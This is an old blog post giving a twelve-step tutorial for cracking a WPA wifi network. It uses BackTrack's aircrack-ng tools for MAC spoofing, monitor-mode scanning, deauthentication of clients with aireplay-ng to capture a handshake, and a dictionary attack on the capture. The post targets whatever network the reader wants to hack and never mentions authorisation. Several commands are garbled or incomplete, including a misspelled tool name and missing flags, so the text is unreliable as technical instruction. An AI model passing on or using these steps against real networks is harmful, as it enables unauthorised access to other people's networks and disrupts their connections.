Friday, April 18, 2014

Hack wifi using backtrack (O.S)


Hack wifi using backtrack (O.S)

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjehAu9NPf5QuhCLMfjSYVnvQLy9BgeCa4-8FraLjWJuxqEIR_0dZRGP-k7Rrj2Cm_KMT32fyM6tEfID_nCHRpJLuh8n-F8dky49Z2u-ZQhw58tgr5TYF55quujov6RXjHH2FziAt-rMQs0/s1600/Backtrack.png


Step1 : Open a new terminal and type if config     
 
Step 2 : Now we are going to down the server and pass our mac addresses.  To do so enter 
ifconfig wlan0 down.
 
Step 3 : Now pass the mac addresses by using the command -m 00:11:22:33:44:55 wlan0
   
     
Step 4 : Now we are going to start hacking the wifi.  Remember wep is less secured than wpa. Now enter  airmon-ng start wlan0       

                                                                        
Step 5 : Now we can see that monitor mode is enabled. Now to scan for wireless network enter  the command airodump-ng mon0
Step 6: When you enter this command a screen will scan all the wirelesses network . When you find your wifi which you want to hack press ctrl+c to stop scan.  Now copy the bssid of the required wifi.





Step 7 : Now we are going to pass the data to do so enter the command remember you must give your bssid and channel airdump-ng  --bssid 00:23:69:98:AC:05 -c 4 hackwpa mon0


Step 8: Now a page will appear which will send and receive data .  Wait till the limited data is send and recivied .


Step 9:  Dont close the above terminal. Now open a new terminal and enter the command which is to get replay  aireplay-ng  -0 30 -a 00:23:69:98:AC:05 mon0



Step 10 : Now open that terminal which was sending and reciving data . wpa handshake  will be created.


Step 11:  Now open a new terminal and here iam using wordlist if dont have wordlist you can use brutforce and rainbow attack also.Heare Iam using dictionary attack, enter the command to hack
aircrack-ng -w wordlist -b 00:23:69:98:AC:05 hackwpa*.cap

Step 12 : Now you have hacked wifi.





 

0 comments:

Post a Comment